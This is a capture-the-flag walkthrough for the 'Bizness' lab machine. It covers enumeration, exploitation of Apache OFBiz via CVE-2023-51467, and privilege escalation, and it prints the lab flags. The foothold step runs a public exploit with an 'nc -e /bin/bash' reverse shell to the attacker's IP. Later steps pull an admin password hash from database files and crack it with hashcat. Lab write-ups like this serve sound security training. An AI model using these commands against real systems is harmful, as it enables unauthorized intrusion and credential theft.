Bizness - Walkthrough

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- -n -Pn --disable-arp-ping -sS -sV -sC -vvv -T5 10.10.11.252 -oN bizness.nmap

The scan reveals:

The web server redirects to bizness.htb. We add it to /etc/hosts:

echo "10.10.11.252 bizness.htb" | sudo tee -a /etc/hosts

We perform content discovery with ffuf:

ffuf -u https://bizness.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -fc 302 --recursion --recursion-depth 2

The scan reveals /control and /accounting paths. Navigating to them leads to an Apache OFBiz login panel:

Foothold

Apache OFBiz is vulnerable to authentication bypass leading to RCE (CVE-2023-51467). We exploit it to gain a reverse shell:

git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
cd Apache-OFBiz-Authentication-Bypass
python3 exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash 10.10.14.199 5000'

We obtain a shell as ofbiz and capture the user flag:

cat ~/user.txt

User flag: 9b7ab7d13e494db670510746dc5731b1

Privilege Escalation

OFBiz uses a Derby database stored at /opt/ofbiz/runtime/data/derby/ofbiz/seg0. We search for credentials in the binary data files:

find ./seg0 -type f -exec sh -c 'if strings "{}" 2>/dev/null | grep -q "ofbiz"; then echo "{}"; fi' \; | sort

We examine c54d0.dat and extract an admin password hash:

strings ./c54d0.dat | grep admin

userLoginId="admin"
currentPassword="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"

The hash uses URL-safe Base64 encoding. We convert it to standard format for hashcat:

echo "uP0/QaVBpDWFeo8+dRzDqRwXQ2I" | tr "_-" "/+" | base64 -d | xxd -p

Hash: b8fd3f41a541a435857a8f3e751cc3a91c174362

We crack the SHA-1 hash:

hashcat -m 120 -a 0 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt

We switch to root and obtain the flag:

su root
cat /root/root.txt

Root flag: 504e5f94ad46598cc4ac7c09642aaa21